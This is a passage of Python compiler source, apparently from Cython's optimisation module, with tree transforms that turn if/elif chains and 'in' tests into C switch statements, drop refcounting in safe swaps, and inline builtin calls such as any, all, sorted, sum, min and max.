                if isinstance(cond.operand2, ExprNodes.UnicodeNode) and \
                       cond.operand2.contains_surrogates():
                    # dealing with surrogates leads to different
                    # behaviour on wide and narrow Unicode
                    # platforms => refuse to optimise this case
                    return self.NO_MATCH
                return not_in, cond.operand1, self.extract_in_string_conditions(cond.operand2)
            elif not cond.is_python_comparison():
                if cond.operator == '==':
                    not_in = False
                elif allow_not_in and cond.operator == '!=':
                    not_in = True
                else:
                    return self.NO_MATCH
                # this looks somewhat silly, but it does the right
                # checks for NameNode and AttributeNode
                if is_common_value(cond.operand1, cond.operand1):
                    if cond.operand2.is_literal:
                        return not_in, cond.operand1, [cond.operand2]
                    elif getattr(cond.operand2, 'entry', None) \
                             and cond.operand2.entry.is_const:
                        return not_in, cond.operand1, [cond.operand2]
                if is_common_value(cond.operand2, cond.operand2):
                    if cond.operand1.is_literal:
                        return not_in, cond.operand2, [cond.operand1]
                    elif getattr(cond.operand1, 'entry', None) \
                             and cond.operand1.entry.is_const:
                        return not_in, cond.operand2, [cond.operand1]
        elif isinstance(cond, ExprNodes.BoolBinopNode):
            # merge "x == a or x == b" (or the negated 'and' chain) into a
            # single case-value list if both sides test the same variable
            if cond.operator == 'or' or (allow_not_in and cond.operator == 'and'):
                allow_not_in = (cond.operator == 'and')
                not_in_1, t1, c1 = self.extract_conditions(cond.operand1, allow_not_in)
                not_in_2, t2, c2 = self.extract_conditions(cond.operand2, allow_not_in)
                if t1 is not None and not_in_1 == not_in_2 and is_common_value(t1, t2):
                    if (not not_in_1) or allow_not_in:
                        return not_in_1, t1, c1+c2
        return self.NO_MATCH

    def extract_in_string_conditions(self, string_literal):
        # Turn the distinct characters of a string literal into a sorted
        # list of constant nodes usable as switch case values.
        if isinstance(string_literal, ExprNodes.UnicodeNode):
            charvals = list(map(ord, set(string_literal.value)))
            charvals.sort()
            return [ ExprNodes.IntNode(string_literal.pos, value=str(charval),
                                       constant_result=charval)
                     for charval in charvals ]
        else:
            # this is a bit tricky as Py3's bytes type returns
            # integers on iteration, whereas Py2 returns 1-char byte
            # strings
            characters = string_literal.value
            characters = list(set([ characters[i:i+1] for i in range(len(characters)) ]))
            characters.sort()
            return [ ExprNodes.CharNode(string_literal.pos, value=charval,
                                        constant_result=charval)
                     for charval in characters ]

    def extract_common_conditions(self, common_var, condition, allow_not_in):
        # Like extract_conditions(), but additionally requires the tested
        # variable to match 'common_var' (if given) and both the variable
        # and all case values to be of int/enum type.
        not_in, var, conditions = self.extract_conditions(condition, allow_not_in)
        if var is None:
            return self.NO_MATCH
        elif common_var is not None and not is_common_value(var, common_var):
            return self.NO_MATCH
        elif not (var.type.is_int or var.type.is_enum) or sum([not (cond.type.is_int or cond.type.is_enum) for cond in conditions]):
            return self.NO_MATCH
        return not_in, var, conditions

    def has_duplicate_values(self, condition_values):
        # duplicated values don't work in a switch statement
        seen = set()
        for value in condition_values:
            if value.has_constant_result():
                if value.constant_result in seen:
                    return True
                seen.add(value.constant_result)
            else:
                # this isn't completely safe as we don't know the
                # final C value, but this is about the best we can do
                try:
                    if value.entry.cname in seen:
                        return True
                except AttributeError:
                    return True # play safe
                seen.add(value.entry.cname)
        return False

    def visit_IfStatNode(self, node):
        # Replace a whole if/elif chain by a single switch statement, if
        # every clause compares the same int variable against constants.
        if not self.current_directives.get('optimize.use_switch'):
            self.visitchildren(node)
            return node
        common_var = None
        cases = []
        for if_clause in node.if_clauses:
            _, common_var, conditions = self.extract_common_conditions(
                common_var, if_clause.condition, False)
            if common_var is None:
                self.visitchildren(node)
                return node
            cases.append(Nodes.SwitchCaseNode(pos = if_clause.pos,
                                              conditions = conditions,
                                              body = if_clause.body))
        condition_values = [
            cond for case in cases for cond in case.conditions]
        if len(condition_values) < 2:
            # not worth a switch statement
            self.visitchildren(node)
            return node
        if self.has_duplicate_values(condition_values):
            # duplicated case values are invalid C
            self.visitchildren(node)
            return node
        common_var = unwrap_node(common_var)
        switch_node = Nodes.SwitchStatNode(pos = node.pos,
                                           test = common_var,
                                           cases = cases,
                                           else_clause = node.else_clause)
        return switch_node

    def visit_CondExprNode(self, node):
        # Replace "a if x in (...) else b" by a switch assigning a or b.
        if not self.current_directives.get('optimize.use_switch'):
            self.visitchildren(node)
            return node
        not_in, common_var, conditions = self.extract_common_conditions(
            None, node.test, True)
        if common_var is None \
               or len(conditions) < 2 \
               or self.has_duplicate_values(conditions):
            self.visitchildren(node)
            return node
        return self.build_simple_switch_statement(
            node, common_var, conditions, not_in,
            node.true_val, node.false_val)

    def visit_BoolBinopNode(self, node):
        # Replace "x == a or x == b or ..." by a switch producing a bool.
        if not self.current_directives.get('optimize.use_switch'):
            self.visitchildren(node)
            return node
        not_in, common_var, conditions = self.extract_common_conditions(
            None, node, True)
        if common_var is None \
               or len(conditions) < 2 \
               or self.has_duplicate_values(conditions):
            self.visitchildren(node)
            node.wrap_operands(self.current_env()) # in case we changed the operands
            return node
        return self.build_simple_switch_statement(
            node, common_var, conditions, not_in,
            ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
            ExprNodes.BoolNode(node.pos, value=False, constant_result=False))

    def visit_PrimaryCmpNode(self, node):
        # Replace "x in (a, b, ...)" used as a boolean value by a switch.
        if not self.current_directives.get('optimize.use_switch'):
            self.visitchildren(node)
            return node
        not_in, common_var, conditions = self.extract_common_conditions(
            None, node, True)
        if common_var is None \
               or len(conditions) < 2 \
               or self.has_duplicate_values(conditions):
            self.visitchildren(node)
            return node
        return self.build_simple_switch_statement(
            node, common_var, conditions, not_in,
            ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
            ExprNodes.BoolNode(node.pos, value=False, constant_result=False))

    def build_simple_switch_statement(self, node, common_var, conditions,
                                      not_in, true_val, false_val):
        # Build a switch with one case assigning 'true_val' to a result temp
        # and an else clause assigning 'false_val' (swapped when 'not_in'),
        # then wrap it so it can be used where the expression 'node' was.
        result_ref = UtilNodes.ResultRefNode(node)
        true_body = Nodes.SingleAssignmentNode(
            node.pos,
            lhs=result_ref,
            rhs=true_val.coerce_to(node.type, self.current_env()),
            first=True)
        false_body = Nodes.SingleAssignmentNode(
            node.pos,
            lhs=result_ref,
            rhs=false_val.coerce_to(node.type, self.current_env()),
            first=True)

        if not_in:
            true_body, false_body = false_body, true_body

        cases = [Nodes.SwitchCaseNode(pos = node.pos,
                                      conditions = conditions,
                                      body = true_body)]
        common_var = unwrap_node(common_var)
        switch_node = Nodes.SwitchStatNode(pos = node.pos,
                                           test = common_var,
                                           cases = cases,
                                           else_clause = false_body)
        replacement = UtilNodes.TempResultFromStatNode(result_ref, switch_node)
        return replacement

    def visit_EvalWithTempExprNode(self, node):
        if not self.current_directives.get('optimize.use_switch'):
            self.visitchildren(node)
            return node
        # drop unused expression temp from FlattenInListTransform
        orig_expr = node.subexpression
        temp_ref = node.lazy_temp
        self.visitchildren(node)
        if node.subexpression is not orig_expr:
            # node was restructured => check if temp is still used
            if not Visitor.tree_contains(node.subexpression, temp_ref):
                return node.subexpression
        return node

    visit_Node = Visitor.VisitorTransform.recurse_to_children
class FlattenInListTransform(Visitor.VisitorTransform, SkipDeclarations):
    """
    This transformation flattens "x in [val1, ..., valn]" into a sequential list
    of comparisons.
    """

    def visit_PrimaryCmpNode(self, node):
        # Rewrite "x in (a, b, c)" (or "not_in") over a literal
        # tuple/list/set into "x == a or x == b or x == c" (resp. the
        # '!=' / 'and' chain), evaluating 'x' and all non-simple values
        # only once via temp references.
        self.visitchildren(node)
        if node.cascade is not None:
            # chained comparisons are not supported
            return node
        elif node.operator == 'in':
            conjunction = 'or'
            eq_or_neq = '=='
        elif node.operator == 'not_in':
            conjunction = 'and'
            eq_or_neq = '!='
        else:
            return node

        if not isinstance(node.operand2, (ExprNodes.TupleNode,
                                          ExprNodes.ListNode,
                                          ExprNodes.SetNode)):
            return node

        args = node.operand2.args
        if len(args) == 0:
            # note: lhs may have side effects
            return node

        lhs = UtilNodes.ResultRefNode(node.operand1)

        conds = []
        temps = []
        for arg in args:
            try:
                # Trial optimisation to avoid redundant temp
                # assignments. However, since is_simple() is meant to
                # be called after type analysis, we ignore any errors
                # and just play safe in that case.
                is_simple_arg = arg.is_simple()
            except Exception:
                is_simple_arg = False
            if not is_simple_arg:
                # must evaluate all non-simple RHS before doing the comparisons
                arg = UtilNodes.LetRefNode(arg)
                temps.append(arg)
            cond = ExprNodes.PrimaryCmpNode(
                pos = node.pos,
                operand1 = lhs,
                operator = eq_or_neq,
                operand2 = arg,
                cascade = None)
            conds.append(ExprNodes.TypecastNode(
                pos = node.pos,
                operand = cond,
                type = PyrexTypes.c_bint_type))

        def concat(left, right):
            # combine two comparisons with the chosen boolean operator
            return ExprNodes.BoolBinopNode(
                pos = node.pos,
                operator = conjunction,
                operand1 = left,
                operand2 = right)

        condition = reduce(concat, conds)
        # bind the lhs temp, then each value temp (innermost first)
        new_node = UtilNodes.EvalWithTempExprNode(lhs, condition)
        for temp in temps[::-1]:
            new_node = UtilNodes.EvalWithTempExprNode(temp, new_node)
        return new_node

    visit_Node = Visitor.VisitorTransform.recurse_to_children
class DropRefcountingTransform(Visitor.VisitorTransform):
    """Drop ref-counting in safe places.
    """
    visit_Node = Visitor.VisitorTransform.recurse_to_children

    def visit_ParallelAssignmentNode(self, node):
        """
        Parallel swap assignments like 'a,b = b,a' are safe.

        Disables managed (ref-counted) temps for the operands when the lhs
        and rhs names form a non-redundant permutation of each other, so
        no object can be dropped to a zero refcount during the swap.
        """
        left_names, right_names = [], []
        left_indices, right_indices = [], []
        temps = []

        for stat in node.stats:
            if isinstance(stat, Nodes.SingleAssignmentNode):
                if not self._extract_operand(stat.lhs, left_names,
                                             left_indices, temps):
                    return node
                if not self._extract_operand(stat.rhs, right_names,
                                             right_indices, temps):
                    return node
            elif isinstance(stat, Nodes.CascadedAssignmentNode):
                # FIXME
                return node
            else:
                return node

        if left_names or right_names:
            # lhs/rhs names must be a non-redundant permutation
            lnames = [ path for path, n in left_names ]
            rnames = [ path for path, n in right_names ]
            if set(lnames) != set(rnames):
                return node
            if len(set(lnames)) != len(right_names):
                return node

        if left_indices or right_indices:
            # base name and index of index nodes must be a
            # non-redundant permutation
            lindices = []
            for lhs_node in left_indices:
                index_id = self._extract_index_id(lhs_node)
                if not index_id:
                    return node
                lindices.append(index_id)
            rindices = []
            for rhs_node in right_indices:
                index_id = self._extract_index_id(rhs_node)
                if not index_id:
                    return node
                rindices.append(index_id)

            if set(lindices) != set(rindices):
                return node
            if len(set(lindices)) != len(right_indices):
                return node

            # really supporting IndexNode requires support in
            # __Pyx_GetItemInt(), so let's stop short for now
            return node

        # the swap is safe => drop managed refs on all involved nodes
        temp_args = [t.arg for t in temps]
        for temp in temps:
            temp.use_managed_ref = False

        for _, name_node in left_names + right_names:
            if name_node not in temp_args:
                name_node.use_managed_ref = False

        for index_node in left_indices + right_indices:
            index_node.use_managed_ref = False

        return node

    def _extract_operand(self, node, names, indices, temps):
        # Classify one assignment operand: dotted C-attribute/name targets
        # go into 'names', list-index targets into 'indices', coercion
        # temps into 'temps'.  Returns False for unsupported operands.
        node = unwrap_node(node)
        if not node.type.is_pyobject:
            return False
        if isinstance(node, ExprNodes.CoerceToTempNode):
            temps.append(node)
            node = node.arg
        name_path = []
        obj_node = node
        while isinstance(obj_node, ExprNodes.AttributeNode):
            if obj_node.is_py_attr:
                # Python-level attribute access can run arbitrary code
                return False
            name_path.append(obj_node.member)
            obj_node = obj_node.obj
        if isinstance(obj_node, ExprNodes.NameNode):
            name_path.append(obj_node.name)
            names.append( ('.'.join(name_path[::-1]), node) )
        elif isinstance(node, ExprNodes.IndexNode):
            if node.base.type != Builtin.list_type:
                return False
            if not node.index.type.is_int:
                return False
            if not isinstance(node.base, ExprNodes.NameNode):
                return False
            indices.append(node)
        else:
            return False
        return True

    def _extract_index_id(self, index_node):
        # Return a hashable (base_name, index_name) pair identifying a
        # list-index operand, or None if the index form is unsupported.
        base = index_node.base
        index = index_node.index
        if isinstance(index, ExprNodes.NameNode):
            index_val = index.name
        elif isinstance(index, ExprNodes.ConstNode):
            # FIXME:
            return None
        else:
            return None
        return (base.name, index_val)
class EarlyReplaceBuiltinCalls(Visitor.EnvTransform):
    """Optimize some common calls to builtin types *before* the type
    analysis phase and *after* the declarations analysis phase.

    This transform cannot make use of any argument types, but it can
    restructure the tree in a way that the type analysis phase can
    respond to.

    Introducing C function calls here may not be a good idea. Move
    them to the OptimizeBuiltinCalls transform instead, which runs
    after type analysis.
    """
    # only intercept on call nodes
    visit_Node = Visitor.VisitorTransform.recurse_to_children

    def visit_SimpleCallNode(self, node):
        # Dispatch calls to a (still-)builtin name to a matching handler.
        self.visitchildren(node)
        function = node.function
        if not self._function_is_builtin_name(function):
            return node
        return self._dispatch_to_handler(node, function, node.args)

    def visit_GeneralCallNode(self, node):
        # Same as above for calls that carry keyword arguments.
        self.visitchildren(node)
        function = node.function
        if not self._function_is_builtin_name(function):
            return node
        arg_tuple = node.positional_args
        if not isinstance(arg_tuple, ExprNodes.TupleNode):
            return node
        args = arg_tuple.args
        return self._dispatch_to_handler(
            node, function, args, node.keyword_args)

    def _function_is_builtin_name(self, function):
        # True if 'function' is a plain name that still resolves to the
        # builtin of the same name in the current scope (i.e. was not
        # shadowed by a local definition).
        if not function.is_name:
            return False
        env = self.current_env()
        entry = env.lookup(function.name)
        if entry is not env.builtin_scope().lookup_here(function.name):
            return False
        # if entry is None, it's at least an undeclared name, so likely builtin
        return True

    def _dispatch_to_handler(self, node, function, args, kwargs=None):
        # Look up '_handle_simple_function_NAME' (positional-only call) or
        # '_handle_general_function_NAME' (with keywords) and let it
        # rewrite the call node; unhandled builtins pass through unchanged.
        if kwargs is None:
            handler_name = '_handle_simple_function_%s' % function.name
        else:
            handler_name = '_handle_general_function_%s' % function.name
        handle_call = getattr(self, handler_name, None)
        if handle_call is not None:
            if kwargs is None:
                return handle_call(node, args)
            else:
                return handle_call(node, args, kwargs)
        return node

    def _inject_capi_function(self, node, cname, func_type, utility_code=None):
        # Replace the call's function by a C-API function of the given
        # signature; the call node itself stays in place.
        node.function = ExprNodes.PythonCapiFunctionNode(
            node.function.pos, node.function.name, cname, func_type,
            utility_code = utility_code)

    def _error_wrong_arg_count(self, function_name, node, args, expected=None):
        # Report a compile error for a builtin called with the wrong
        # number of arguments; 'expected' may be a count or a description.
        if not expected: # None or 0
            arg_str = ''
        elif isinstance(expected, basestring) or expected > 1:
            arg_str = '...'
        elif expected == 1:
            arg_str = 'x'
        else:
            arg_str = ''
        if expected is not None:
            expected_str = 'expected %s, ' % expected
        else:
            expected_str = ''
        error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
            function_name, arg_str, expected_str, len(args)))

    # specific handlers for simple call nodes

    def _handle_simple_function_float(self, node, pos_args):
        # float() -> literal 0.0; float(x) is dropped when x is already a
        # C double or a Python float.
        if not pos_args:
            return ExprNodes.FloatNode(node.pos, value='0.0')
        if len(pos_args) > 1:
            self._error_wrong_arg_count('float', node, pos_args, 1)
        arg_type = getattr(pos_args[0], 'type', None)
        if arg_type in (PyrexTypes.c_double_type, Builtin.float_type):
            return pos_args[0]
        return node

    def _handle_simple_function_slice(self, node, pos_args):
        # slice(stop) / slice(start, stop[, step]) -> a literal SliceNode.
        arg_count = len(pos_args)
        start = step = None
        if arg_count == 1:
            stop, = pos_args
        elif arg_count == 2:
            start, stop = pos_args
        elif arg_count == 3:
            start, stop, step = pos_args
        else:
            self._error_wrong_arg_count('slice', node, pos_args)
            return node
        return ExprNodes.SliceNode(
            node.pos,
            start=start or ExprNodes.NoneNode(node.pos),
            stop=stop,
            step=step or ExprNodes.NoneNode(node.pos))

    class YieldNodeCollector(Visitor.TreeVisitor):
        # Collects the yield expressions (and the statements directly
        # holding them) inside a generator expression body.
        def __init__(self):
            Visitor.TreeVisitor.__init__(self)
            self.yield_stat_nodes = {}
            self.yield_nodes = []

        visit_Node = Visitor.TreeVisitor.visitchildren
        # XXX: disable inlining while it's not back supported
        def __visit_YieldExprNode(self, node):
            self.yield_nodes.append(node)
            self.visitchildren(node)

        def __visit_ExprStatNode(self, node):
            self.visitchildren(node)
            if node.expr in self.yield_nodes:
                self.yield_stat_nodes[node.expr] = node

        def __visit_GeneratorExpressionNode(self, node):
            # enable when we support generic generator expressions
            #
            # everything below this node is out of scope
            pass

    def _find_single_yield_expression(self, node):
        # Return (yield_argument, enclosing_statement) if 'node' contains
        # exactly one yield expression, else (None, None).
        collector = self.YieldNodeCollector()
        collector.visitchildren(node)
        if len(collector.yield_nodes) != 1:
            return None, None
        yield_node = collector.yield_nodes[0]
        try:
            return (yield_node.arg, collector.yield_stat_nodes[yield_node])
        except KeyError:
            return None, None

    def _handle_simple_function_all(self, node, pos_args):
        """Transform

        _result = all(x for L in LL for x in L)

        into

        for L in LL:
            for x in L:
                if not x:
                    _result = False
                    break
            else:
                continue
            break
        else:
            _result = True
        """
        return self._transform_any_all(node, pos_args, False)

    def _handle_simple_function_any(self, node, pos_args):
        """Transform

        _result = any(x for L in LL for x in L)

        into

        for L in LL:
            for x in L:
                if x:
                    _result = True
                    break
            else:
                continue
            break
        else:
            _result = False
        """
        return self._transform_any_all(node, pos_args, True)

    def _transform_any_all(self, node, pos_args, is_any):
        # Shared implementation of the any()/all() inlining documented in
        # the two handlers above.  'is_any' selects the result polarity.
        if len(pos_args) != 1:
            return node
        if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
            return node
        gen_expr_node = pos_args[0]
        loop_node = gen_expr_node.loop
        yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
        if yield_expression is None:
            return node

        if is_any:
            condition = yield_expression
        else:
            condition = ExprNodes.NotNode(yield_expression.pos, operand = yield_expression)

        # replace the yield statement by "if <cond>: _result = <is_any>; break"
        result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.c_bint_type)
        test_node = Nodes.IfStatNode(
            yield_expression.pos,
            else_clause = None,
            if_clauses = [ Nodes.IfClauseNode(
                yield_expression.pos,
                condition = condition,
                body = Nodes.StatListNode(
                    node.pos,
                    stats = [
                        Nodes.SingleAssignmentNode(
                            node.pos,
                            lhs = result_ref,
                            rhs = ExprNodes.BoolNode(yield_expression.pos, value = is_any,
                                                     constant_result = is_any)),
                        Nodes.BreakStatNode(node.pos)
                        ])) ]
            )
        loop = loop_node
        while isinstance(loop.body, Nodes.LoopNode):
            # propagate the inner break through nested loops via
            # "else: continue" + a break after each inner loop
            next_loop = loop.body
            loop.body = Nodes.StatListNode(loop.body.pos, stats = [
                loop.body,
                Nodes.BreakStatNode(yield_expression.pos)
                ])
            next_loop.else_clause = Nodes.ContinueStatNode(yield_expression.pos)
            loop = next_loop
        # loop ran to completion => the default result
        loop_node.else_clause = Nodes.SingleAssignmentNode(
            node.pos,
            lhs = result_ref,
            rhs = ExprNodes.BoolNode(yield_expression.pos, value = not is_any,
                                     constant_result = not is_any))
        Visitor.recursively_replace_node(loop_node, yield_stat_node, test_node)
        return ExprNodes.InlinedGeneratorExpressionNode(
            gen_expr_node.pos, loop = loop_node, result_node = result_ref,
            expr_scope = gen_expr_node.expr_scope, orig_func = is_any and 'any' or 'all')

    # C signature of PySequence_List(): reads any iterable into a new list.
    PySequence_List_func_type = PyrexTypes.CFuncType(
        Builtin.list_type,
        [PyrexTypes.CFuncTypeArg("it", PyrexTypes.py_object_type, None)])

    def _handle_simple_function_sorted(self, node, pos_args):
        """Transform sorted(genexpr) and sorted([listcomp]) into
        [listcomp].sort(). CPython just reads the iterable into a
        list and calls .sort() on it. Expanding the iterable in a
        listcomp is still faster and the result can be sorted in
        place.
        """
        if len(pos_args) != 1:
            return node
        if isinstance(pos_args[0], ExprNodes.ComprehensionNode) \
               and pos_args[0].type is Builtin.list_type:
            listcomp_node = pos_args[0]
            loop_node = listcomp_node.loop
        elif isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
            # turn the genexpr into an equivalent list comprehension
            gen_expr_node = pos_args[0]
            loop_node = gen_expr_node.loop
            yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
            if yield_expression is None:
                return node

            append_node = ExprNodes.ComprehensionAppendNode(
                yield_expression.pos, expr = yield_expression)
            Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)

            listcomp_node = ExprNodes.ComprehensionNode(
                gen_expr_node.pos, loop = loop_node,
                append = append_node, type = Builtin.list_type,
                expr_scope = gen_expr_node.expr_scope,
                has_local_scope = True)
            append_node.target = listcomp_node
        elif isinstance(pos_args[0], (ExprNodes.ListNode, ExprNodes.TupleNode)):
            # sorted([a, b, c]) or sorted((a, b, c)). The result of the latter
            # is a list in CPython, so change it into one.
            expr = pos_args[0].as_list()
            listcomp_node = loop_node = expr
        else:
            # Interestingly, PySequence_List works on a lot of non-sequence
            # things as well.
            listcomp_node = loop_node = ExprNodes.PythonCapiCallNode(
                node.pos, "PySequence_List", self.PySequence_List_func_type,
                args=pos_args, is_temp=True)

        # build "<result> = <list>; <result>.sort()" as one expression
        result_node = UtilNodes.ResultRefNode(
            pos = loop_node.pos, type = Builtin.list_type, may_hold_none=False)
        listcomp_assign_node = Nodes.SingleAssignmentNode(
            node.pos, lhs = result_node, rhs = listcomp_node, first = True)

        sort_method = ExprNodes.AttributeNode(
            node.pos, obj = result_node, attribute = EncodedString('sort'),
            # entry ? type ?
            needs_none_check = False)
        sort_node = Nodes.ExprStatNode(
            node.pos, expr = ExprNodes.SimpleCallNode(
                node.pos, function = sort_method, args = []))

        sort_node.analyse_declarations(self.current_env())

        return UtilNodes.TempResultFromStatNode(
            result_node,
            Nodes.StatListNode(node.pos, stats = [ listcomp_assign_node, sort_node ]))

    def _handle_simple_function_sum(self, node, pos_args):
        """Transform sum(genexpr) into an equivalent inlined aggregation loop.
        """
        if len(pos_args) not in (1,2):
            return node
        if not isinstance(pos_args[0], (ExprNodes.GeneratorExpressionNode,
                                        ExprNodes.ComprehensionNode)):
            return node
        gen_expr_node = pos_args[0]
        loop_node = gen_expr_node.loop

        if isinstance(gen_expr_node, ExprNodes.GeneratorExpressionNode):
            yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
            if yield_expression is None:
                return node
        else: # ComprehensionNode
            yield_stat_node = gen_expr_node.append
            yield_expression = yield_stat_node.expr
            try:
                if not yield_expression.is_literal or not yield_expression.type.is_int:
                    return node
            except AttributeError:
                return node # in case we don't have a type yet
            # special case: old Py2 backwards compatible "sum([int_const for ...])"
            # can safely be unpacked into a genexpr

        if len(pos_args) == 1:
            start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
        else:
            start = pos_args[1]

        # replace the yield by "_result = _result + <value>"
        result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.py_object_type)
        add_node = Nodes.SingleAssignmentNode(
            yield_expression.pos,
            lhs = result_ref,
            rhs = ExprNodes.binop_node(node.pos, '+', result_ref, yield_expression)
            )

        Visitor.recursively_replace_node(loop_node, yield_stat_node, add_node)

        # "_result = <start>" followed by the aggregation loop
        exec_code = Nodes.StatListNode(
            node.pos,
            stats = [
                Nodes.SingleAssignmentNode(
                    start.pos,
                    lhs = UtilNodes.ResultRefNode(pos=node.pos, expression=result_ref),
                    rhs = start,
                    first = True),
                loop_node
                ])

        return ExprNodes.InlinedGeneratorExpressionNode(
            gen_expr_node.pos, loop = exec_code, result_node = result_ref,
            expr_scope = gen_expr_node.expr_scope, orig_func = 'sum',
            has_local_scope = gen_expr_node.has_local_scope)

    def _handle_simple_function_min(self, node, pos_args):
        return self._optimise_min_max(node, pos_args, '<')

    def _handle_simple_function_max(self, node, pos_args):
        return self._optimise_min_max(node, pos_args, '>')

    def _optimise_min_max(self, node, args, operator):
        """Replace min(a,b,...) and max(a,b,...) by explicit comparison code.
        """
        if len(args) <= 1:
            if len(args) == 1 and args[0].is_sequence_constructor:
                args = args[0].args
            else:
                # leave this to Python
                return node

        # fold the arguments into nested conditional expressions, holding
        # each intermediate result in a temp reference
        cascaded_nodes = list(map(UtilNodes.ResultRefNode, args[1:]))

        last_result = args[0]
        for arg_node in cascaded_nodes:
            result_ref = UtilNodes.ResultRefNode(last_result)
            last_result = ExprNodes.CondExprNode(
                arg_node.pos,
                true_val = arg_node,
                false_val = result_ref,
                test = ExprNodes.PrimaryCmpNode(
                    arg_node.pos,
                    operand1 = arg_node,
                    operator = operator,
                    operand2 = result_ref,
                    )
                )
            last_result = UtilNodes.EvalWithTempExprNode(result_ref, last_result)

        for ref_node in cascaded_nodes[::-1]:
            last_result = UtilNodes.EvalWithTempExprNode(ref_node, last_result)

        return last_result

    def _DISABLED_handle_simple_function_tuple(self, node, pos_args):
        # disabled (see the XXX comment below) - tuple(genexpr) rewrite.
        if not pos_args:
            return ExprNodes.TupleNode(node.pos, args=[], constant_result=())
        # This is a bit special - for iterables (including genexps),
        # Python actually overallocates and resizes a newly created
        # tuple incrementally while reading items, which we can't
        # easily do without explicit node support. Instead, we read
        # the items into a list and then copy them into a tuple of the
        # final size. This takes up to twice as much memory, but will
        # have to do until we have real support for genexps.
        result = self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)
        if result is not node:
            return ExprNodes.AsTupleNode(node.pos, arg=result)
        return node

    def _handle_simple_function_frozenset(self, node, pos_args):
        """Replace frozenset([...]) by frozenset((...)) as tuples are more efficient.
        """
        if len(pos_args) != 1:
            return node
        if pos_args[0].is_sequence_constructor and not pos_args[0].args:
            # frozenset(<empty>) == frozenset()
            del pos_args[0]
        elif isinstance(pos_args[0], ExprNodes.ListNode):
            pos_args[0] = pos_args[0].as_tuple()
        return node

    def _handle_simple_function_list(self, node, pos_args):
        # list() -> literal []; list(genexpr) -> list comprehension.
        if not pos_args:
            return ExprNodes.ListNode(node.pos, args=[], constant_result=[])
        return self._transform_list_set_genexpr(node, pos_args, Builtin.list_type)

    def _handle_simple_function_set(self, node, pos_args):
        # set() -> literal set(); set(genexpr) -> set comprehension.
        if not pos_args:
            return ExprNodes.SetNode(node.pos, args=[], constant_result=set())
        return self._transform_list_set_genexpr(node, pos_args, Builtin.set_type)

    def _transform_list_set_genexpr(self, node, pos_args, target_type):
        """Replace set(genexpr) and list(genexpr) by a literal comprehension.
        """
        if len(pos_args) > 1:
            return node
        if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
            return node
        gen_expr_node = pos_args[0]
        loop_node = gen_expr_node.loop

        yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
        if yield_expression is None:
            return node

        # replace the yield by an append into the comprehension target
        append_node = ExprNodes.ComprehensionAppendNode(
            yield_expression.pos,
            expr = yield_expression)

        Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)

        comp = ExprNodes.ComprehensionNode(
            node.pos,
            has_local_scope = True,
            expr_scope = gen_expr_node.expr_scope,
            loop = loop_node,
            append = append_node,
            type = target_type)
        append_node.target = comp
        return comp

    def _handle_simple_function_dict(self, node, pos_args):
        """Replace dict( (a,b) for ... ) by a literal { a:b for ... }.
        """
        if len(pos_args) == 0:
            return ExprNodes.DictNode(node.pos, key_value_pairs=[], constant_result={})
        if len(pos_args) > 1:
            return node
        if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
            return node
        gen_expr_node = pos_args[0]
        loop_node = gen_expr_node.loop

        yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
        if yield_expression is None:
            return node

        # only (key, value) 2-tuples can feed a dict comprehension
        if not isinstance(yield_expression, ExprNodes.TupleNode):
            return node
        if len(yield_expression.args) != 2:
            return node

        append_node = ExprNodes.DictComprehensionAppendNode(
            yield_expression.pos,
            key_expr = yield_expression.args[0],
            value_expr = yield_expression.args[1])

        Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)

        dictcomp = ExprNodes.ComprehensionNode(
            node.pos,
            has_local_scope = True,
            expr_scope = gen_expr_node.expr_scope,
            loop = loop_node,
            append = append_node,
            type = Builtin.dict_type)
        append_node.target = dictcomp
        return dictcomp

    # specific handlers for general call nodes

    def _handle_general_function_dict(self, node, pos_args, kwargs):
        """Replace dict(a=b,c=d,...) by the underlying keyword dict
        construction which is done anyway.
        """
        if len(pos_args) > 0:
            return node
        if not isinstance(kwargs, ExprNodes.DictNode):
            return node
        return kwargs
class InlineDefNodeCalls(Visitor.NodeRefCleanupMixin, Visitor.EnvTransform):
    # Replaces calls to locally defined Python functions by inlined call
    # nodes when the 'optimize.inline_defnode_calls' directive is enabled.
    visit_Node = Visitor.VisitorTransform.recurse_to_children

    def get_constant_value_node(self, name_node):
        # Return the single assigned RHS of 'name_node' if control flow
        # analysis proves it has exactly one non-NULL value, else None.
        if name_node.cf_state is None:
            return None
        if name_node.cf_state.cf_is_null:
            return None
        entry = self.current_env().lookup(name_node.name)
        if not entry or (not entry.cf_assignments
                         or len(entry.cf_assignments) != 1):
            # not just a single assignment in all closures
            return None
        return entry.cf_assignments[0].rhs

    def visit_SimpleCallNode(self, node):
        # Try to replace a call to a name that provably refers to a single
        # local def function by a direct inlined call.
        self.visitchildren(node)
        if not self.current_directives.get('optimize.inline_defnode_calls'):
            return node
        function_name = node.function
        if not function_name.is_name:
            return node
        function = self.get_constant_value_node(function_name)
        if not isinstance(function, ExprNodes.PyCFunctionNode):
            return node
        inlined = ExprNodes.InlinedDefNodeCallNode(
            node.pos, function_name=function_name,
            function=function, args=node.args)
        if inlined.can_be_inlined():
            return self.replace(node, inlined)
        return node
class OptimizeBuiltinCalls(Visitor.NodeRefCleanupMixin,
Visitor.MethodDispatcherTransform):
"""Optimize some common methods calls and instantiation patterns
for builtin types *after* the type analysis phase.
Running after type analysis, this transform can only perform
function replacements that do not alter the function return type
in a way that was not anticipated by the type analysis.
"""
### cleanup to avoid redundant coercions to/from Python types
